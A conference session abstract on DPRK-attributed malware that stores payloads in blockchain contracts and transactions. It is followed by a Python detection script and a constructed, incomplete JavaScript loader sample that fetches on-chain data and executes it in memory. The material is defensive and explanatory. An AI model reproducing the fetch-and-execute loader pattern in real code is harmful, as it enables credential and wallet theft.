Session
Smart Contracts, Smart Threats: How DPRK Uses Blockchain for Next-Gen Malware Delivery
In this presentation, I provide an overview of how blockchain technologies are being leveraged for malware delivery. Using smart contracts, transaction data, and cross-chain mechanisms, actors can host, deliver, and maintain payloads with stealth and persistence.
Attacks often start with social engineering via Telegram, LinkedIn, or GitHub, tricking victims into downloading repositories containing obfuscated JavaScript loaders. The loaders decode hidden blockchain addresses, keys, and API endpoints, then retrieve malicious payloads from public chains like Ethereum, BNB Smart Chain, TRON, and Aptos.
Three delivery methods are highlighted:
- EtherHiding: Payloads embedded in smart-contract storage, retrievable without logs or on-chain traces.
- TxDataHiding: Payload fragments hidden in historical transactions.
- Cross-Chain TxDataHiding: Multi-chain pointers ensure redundancy and fallback.
Payloads execute entirely in memory, deploying modular capabilities including credential theft, browser and crypto wallet harvesting, and remote access. The campaign is attributed to DPRK threat actors, sometimes called ‘Famous Chollima’, though some pre-attack and remote-access infrastructure uses Russian hosting, highlighting the complexity of attribution. Even with this mixed infrastructure, the operational behavior, including targeting crypto wallets and harvesting sensitive data, aligns with DPRK’s typical objectives.
The session also covers defensive challenges: limited visibility, traffic indistinguishable from legitimate blockchain activity, and difficulty blocking malicious endpoints without disrupting operations. Attendees will gain a high-level understanding of blockchain-based malware, emerging Web3 threats, and detection limitations.
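One static triage check for the loader stage described above, added here as an example and not part of the talk or of any vendor tool: it decodes base64 literals, looks for chain addresses and JSON-RPC read methods in both the raw and decoded text, and flags in-memory execution sinks. The sample loader, the method list and the verdict thresholds are constructed assumptions.

```python
import base64
import re

# Heuristics for the loader stage the talk describes: decode a hidden chain address,
# read data from a public chain over JSON-RPC, execute the result in memory.
EVM_ADDRESS = re.compile(r"0x[0-9a-fA-F]{40}\b")
TRON_ADDRESS = re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b")
RPC_METHODS = ("eth_call", "eth_getStorageAt", "eth_getTransactionByHash",
               "eth_getTransactionReceipt", "eth_getLogs")  # real Ethereum JSON-RPC names
EXEC_SINKS = ("eval(", "new Function(")
B64_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def decode_atob_literals(js):
    """Decode every atob("...") literal that is valid base64 and valid UTF-8."""
    out = []
    for blob in B64_LITERAL.findall(js):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def scan_loader(js):
    """Report chain addresses, on-chain read calls and execution sinks in a JS file."""
    decoded = decode_atob_literals(js)
    haystack = js + "\n" + "\n".join(decoded)  # search decoded strings too
    findings = {
        "evm_addresses": sorted(set(EVM_ADDRESS.findall(haystack))),
        "tron_addresses": sorted(set(TRON_ADDRESS.findall(haystack))),
        "rpc_methods": [m for m in RPC_METHODS if m in haystack],
        "exec_sinks": [s for s in EXEC_SINKS if s in js],
    }
    has_addr = bool(findings["evm_addresses"] or findings["tron_addresses"])
    # All three stages together is the signal; any one alone is common in dapp code.
    if has_addr and findings["rpc_methods"] and findings["exec_sinks"]:
        findings["verdict"] = "loader-pattern"
    elif has_addr or findings["rpc_methods"]:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "clean"
    return findings


# Constructed sample, not a real loader: the atob() literal is base64 of a made-up address.
SAMPLE_JS = r'''
var c = atob("MHhhYmNkZWYxMjM0NTY3ODkwYWJjZGVmMTIzNDU2Nzg5MGFiY2RlZjEy");
fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", method: "eth_call",
  params: [{to: c, data: "0xdeadbeef"}, "latest"]})}).then(r => r.json())
  .then(j => { new Function(hexToStr(j.result))(); });
'''
```

Run `scan_loader(SAMPLE_JS)` to see the "loader-pattern" verdict; a "review" verdict on ordinary dapp front-ends is expected and is why the combined signal, not the address alone, is the trigger.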
Brendan "B" Burke
Threat Hunt Response @ State Street
Kilkenny, Ireland